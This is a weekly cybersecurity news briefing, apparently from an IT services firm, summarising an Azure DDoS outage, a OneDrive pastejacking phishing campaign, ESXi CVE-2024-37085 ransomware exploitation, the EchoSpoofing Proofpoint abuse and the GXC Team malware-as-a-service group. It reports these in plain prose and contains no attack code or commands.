Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Briefing, 27 July - 2 August
Microsoft Azure suffers DDoS attack
Microsoft has confirmed that the incident that paralyzed and interrupted several of the company's services such as Microsoft 365 and Azure worldwide, was produced by a distributed denial of service (DDoS) attack. According to a Microsoft statement, these events were due to the result of a DDoS attack, whose attribution is unknown at the moment, and which was amplified due to a possible error in the implementation of the defense measures used by the company.
It should be noted that this incident lasted for approximately 10 hours, so that numerous companies from different sectors that use these assets were affected. Based on these facts, Microsoft has indicated that it will publish a preliminary analysis of this incident within 72 hours and a more detailed review within 2 weeks.
Phishing campaign "OneDrive Pastejacking" targeting Microsoft OneDrive
Cybersecurity researchers at Trellix have detected a new phishing campaign called "OneDrive Pastejacking" targeting Microsoft OneDrive users in the United States, South Korea, Germany, India, Ireland, Italy, Norway and the United Kingdom. It aims to get users to execute, through social engineering techniques, a malicious PowerShell script.
The attack is carried out by sending an email containing an HTML file. When executed, the file displays an image that pretends to be a OneDrive page, and also includes an error message 0x8004de80, a legitimate and real failure of the application, asking the user to update the DNS cache manually to fix it along with some instructions. If the user follows these, they are prompted to follow a series of steps that ultimately include launching PowerShell and pasting a Base64-encoded command to apparently fix the alleged problem.
Vulnerability in ESXi hypervisors exploited to deploy ransomware
A recently discovered vulnerability affecting ESXi hypervisors is reportedly being exploited by ransomware groups. According to Microsoft, the flaw CVE-2024-37085, CVSSv3 6.8 according to VMware, would be of the authentication bypass type and would allow attackers to gain administrative access to the hypervisor, which in turn would allow them to encrypt the system, access virtual machines and move laterally. Although Microsoft alerted VMware to this vulnerability, which led to the release of patches, malicious actors such as Storm-0506, Storm-1175, Octo Tempest and Manatee Tempest have reportedly been exploiting the flaw in various attacks. Specifically, the researchers note that the attackers executed a series of commands to create a new group called ESX Admins in the domain, culminating on multiple occasions in the deployment of the Akira and BlackBasta ransomware.
Proofpoint Misconfiguration Exploited in Massive Phishing Campaign
A massive phishing campaign recently came to light in which threat actors exploited a misconfiguration in Proofpoint's email protection service. Dubbed EchoSpoofing, this security flaw allowed threat actors to send millions of perfectly authenticated and signed phishing emails, leveraging Proofpoint's customer base, including well-known companies and brands such as Disney, IBM, Nike, Best Buy and Coca-Cola, and distributing them via Microsoft Exchange.
According to Guardio Labs, the attackers used Office365 accounts controlled by them and took advantage of Proofpoint's permissive distribution server settings. The phishing emails were created on virtual servers, passed through Office365 and Proofpoint, which made them look genuine. In addition, the attackers used a unique ID of the counterfeit brand, obtained from the public MX record, for the success of the attack. The campaign, which originated in January 2024, sent up to 14 million emails per day. Proofpoint was notified in May about the problem and indicated that they had been aware of the issue since March and had deployed mitigations and alerted their customers. However, many compromised Office365 accounts used in the attack remain unpatched.
GXC Team: Spanish-speaking malicious actor following MaaS model
The Group-IB research team has published a paper analyzing a Spanish-speaking malicious actor offering Malware as a Service (MaaS) services called GXC Team. Specifically, this actor was discovered in September 2023, although it would have started its actions in January of the same year. They also point out that their services affect Spanish banks and government agencies and institutions at a global level.
GXC Team offers its clients a combination of phishing kits and a malware targeting Android systems, which is an SMS OTP stealer. However, the highlight of this MaaS service is its sophisticated AI-powered phishing-as-a-service platform capable of generating voice calls to its victims based on their input. Finally, it should be noted that Group-IB warns that, although its tools are not very sophisticated, GXC Team's innovative features can be a threat to the security of the banking sector in Spain.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
